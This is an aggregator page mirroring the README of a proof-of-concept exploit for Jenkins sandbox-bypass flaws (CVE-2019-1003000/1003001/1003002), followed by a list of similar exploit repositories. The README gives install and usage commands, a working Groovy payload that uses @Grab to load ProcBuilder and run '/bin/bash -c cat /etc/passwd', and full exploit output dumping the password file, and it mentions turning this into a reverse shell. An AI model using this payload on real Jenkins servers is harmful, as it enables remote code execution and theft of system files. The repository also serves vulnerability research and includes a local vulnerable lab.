GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → adamyordan → Cve 2019 1003000 Jenkins Rce Poc

adamyordan / Cve 2019 1003000 Jenkins Rce Poc

Licence: mit
Jenkins RCE Proof-of-Concept: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

Programming Languages

javascript
184084 projects - #8 most used programming language
groovy
2714 projects

Labels

securityexploitjenkinspoccveinformation-securityrce

Projects that are alternatives of or similar to Cve 2019 1003000 Jenkins Rce Poc

Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (-67.78%)
Mutual labels:  exploit, poc, cve, rce
Penetration testing poc
渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss penetration-testing-poc csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
Stars: ✭ 3,858 (+1328.89%)
Mutual labels:  poc, cve, rce, exploit
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+181.48%)
Mutual labels:  exploit, poc, cve
Vulmap
Vulmap 是一款 web 漏洞扫描和验证工具, 可对 webapps 进行漏洞扫描, 并且具备漏洞利用功能
Stars: ✭ 1,079 (+299.63%)
Mutual labels:  exploit, cve, rce
Jenkins Rce
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
Stars: ✭ 262 (-2.96%)
Mutual labels:  exploit, rce, jenkins
Medusa
🐈Medusa是一个红队武器库平台,目前包括扫描功能(200+个漏洞)、XSS平台、协同平台、CVE监控等功能,持续开发中 http://medusa.ascotbe.com
Stars: ✭ 796 (+194.81%)
Mutual labels:  poc, cve, jenkins
Pwn jenkins
Notes about attacking Jenkins servers
Stars: ✭ 841 (+211.48%)
Mutual labels:  exploit, rce, jenkins
PoC-CVE-2021-41773
No description or website provided.
Stars: ✭ 39 (-85.56%)
Mutual labels:  poc, rce, cve
Ciscoexploit
Cisco Exploit (CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution/CVE-2019-1653/Cisco SNMP RCE/Dump Cisco RV320 Password)
Stars: ✭ 73 (-72.96%)
Mutual labels:  exploit, poc, rce
PocOrExp in Github
聚合Github上已有的Poc或者Exp,CVE信息来自CVE官网。Auto Collect Poc Or Exp from Github by CVE ID.
Stars: ✭ 544 (+101.48%)
Mutual labels:  exploit, poc, cve
Gitlab rce
RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 and LFI for old gitlab versions 10.4 - 12.8.1
Stars: ✭ 104 (-61.48%)
Mutual labels:  exploit, cve, rce
exploits
Some personal exploits/pocs
Stars: ✭ 52 (-80.74%)
Mutual labels:  poc, rce, cve
Exploits
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.
Stars: ✭ 75 (-72.22%)
Mutual labels:  exploit, poc, cve
Umbraco-RCE
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
Stars: ✭ 61 (-77.41%)
Mutual labels:  exploit, poc, rce
Exploit-Development
Exploit Development - Weaponized Exploit and Proof of Concepts (PoC)
Stars: ✭ 84 (-68.89%)
Mutual labels:  exploit, poc, rce
CVE-2021-41773 CVE-2021-42013
Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE
Stars: ✭ 20 (-92.59%)
Mutual labels:  exploit, rce, cve
Commodity Injection Signatures
Commodity Injection Signatures, Malicious Inputs, XSS, HTTP Header Injection, XXE, RCE, Javascript, XSLT
Stars: ✭ 267 (-1.11%)
Mutual labels:  exploit, poc, rce
Scripts-Sploits
A number of scripts POC's and problems solved as pentests move along.
Stars: ✭ 37 (-86.3%)
Mutual labels:  exploit, poc
CVE-2019-10149
CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.
Stars: ✭ 15 (-94.44%)
Mutual labels:  exploit, cve
vulristics
Extensible framework for analyzing publicly available information about vulnerabilities
Stars: ✭ 46 (-82.96%)
Mutual labels:  exploit, cve
View All Similar Projects ➔

PoC: Jenkins RCE

SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)

A proof of concept to allow users with Overall/Read permission and Job/Configure (and optional Job/Build) to bypass the sandbox protection and execute arbitrary code on the Jenkins master or node.

Update: An article by Orange Tsai explaining the exploit chain utilizing CVE-2018-1000861 and CVE-2019-1003000 that bypass the need of Overall/Read permission for a pre-auth RCE: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

Installation

$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
$ cd cve-2019-1003000-jenkins-rce-poc
$ pip install -r requirements.txt

Usage

Pass target url, job name, username/password credential, and system command to be executed, as arguments.

$ python exploit.py --url http://jenkins-site.com --job job_name --username your_user --password your_passwd --cmd "cat /etc/passwd"

Explanation

Quoted from Red Hat Bugzilla - Bug 1667566:

A flaw was found in Pipeline: Declarative Plugin before version 1.3.4.1, Pipeline: Groovy Plugin before version 2.61.1 and Script Security Plugin before version 1.50. Script Security sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements. Both the pipeline validation REST APIs and actual script/pipeline execution are affected. This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master or node. All known unsafe AST transformations in Groovy are now prohibited in sandboxed scripts.

This PoC is using a user with Overall/Read and Job/Configure permission to execute a maliciously modified build script in sandbox mode, and try to bypass the sandbox mode limitation in order to run arbitraty scripts (in this case, we will execute system command).

As a background, Jenkins's pipeline build script is written in groovy. This build script will be compiled and executed in Jenkins master or node, containing definition of the pipeline, e.g. what to do in slave nodes. Jenkins also provide the script to be executed in sandbox mode. In sandbox mode, all dangerous functions are blacklisted, so regular user cannot do anything malicious to the Jenkins server.

However, because the build script is written in Groovy, we can use any class or function in Java packages (However in sandbox mode, dangerous built-in ones are blacklisted). In this case, we are using AST transforming annotations @Grab to make jenkins import arbitrary java packages from external maven repository. In this PoC, I use ProcBuilder class defined in org.buildobjects:jproc:2.2.3 in order to run system shell command.

The payload is defined as below:

import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","cat /etc/passwd").run().getOutputString()

The script above will be compiled and executed in Jenkins master or node. After the job build is done, we can see the result of the shell command cat /etc/passwd in the job console output. Moreover, we can utilize this RCE to gain reverse shell, and literally pwn the Jenkins server!

Example Vulnerable Site

An example vulnerable jenkins is provided in this repository at directory sample-vuln in Docker container format. After booting up, the container image will have a jenkins site hosted on port tcp/8080, with a regular user with Overall/Read + Job/Configure + Job/Build permission with credential user1:user1, and pipeline job with id my-pipeline.

$ cd sample-vuln
$ ./run.sh


$ cd ..
$ python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "cat /etc/passwd"

[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user User 1
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] echo
root❌0:0:root:/root:/bin/ash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
news❌9:13:news:/usr/lib/news:/sbin/nologin
uucp❌10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator❌11:0:operator:/root:/bin/sh
man❌13:15:man:/usr/man:/sbin/nologin
postmaster❌14:12:postmaster:/var/spool/mail:/sbin/nologin
cron❌16:16:cron:/var/spool/cron:/sbin/nologin
ftp❌21:21::/var/lib/ftp:/sbin/nologin
sshd❌22:22:sshd:/dev/null:/sbin/nologin
at❌25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid❌31:31:Squid:/var/cache/squid:/sbin/nologin
xfs❌33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games❌35:35:games:/usr/games:/sbin/nologin
postgres❌70:70::/var/lib/postgresql:/bin/sh
cyrus❌85:12::/usr/cyrus:/sbin/nologin
vpopmail❌89:89::/var/vpopmail:/sbin/nologin
ntp❌123:123:NTP:/var/empty:/sbin/nologin
smmsp❌209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest❌405💯guest:/dev/null:/sbin/nologin
nobody❌65534:65534:nobody:/:/sbin/nologin
jenkins❌1000:1000:Linux User,,,:/var/jenkins_home:/bin/bash

[Pipeline] End of Pipeline
Finished: SUCCESS

Reference

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].